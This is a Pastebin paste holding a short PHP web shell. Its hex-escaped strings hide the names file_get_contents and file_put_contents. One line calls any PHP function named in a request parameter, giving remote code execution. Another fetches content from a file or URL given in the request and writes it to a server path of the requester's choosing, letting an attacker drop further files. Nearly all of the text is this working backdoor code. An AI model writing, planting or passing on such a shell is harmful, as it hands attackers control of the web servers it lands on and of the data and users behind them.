Advertisement
mathio3

Untitled

Jun 29th, 2019
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. <?php
  2. /* up */
  3. $a = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
  4. $b = "\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
  5. var_dump($_REQUEST['a']($_REQUEST['b']));
  6. @$b($_REQUEST['c'], @$a($_REQUEST['d']));
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement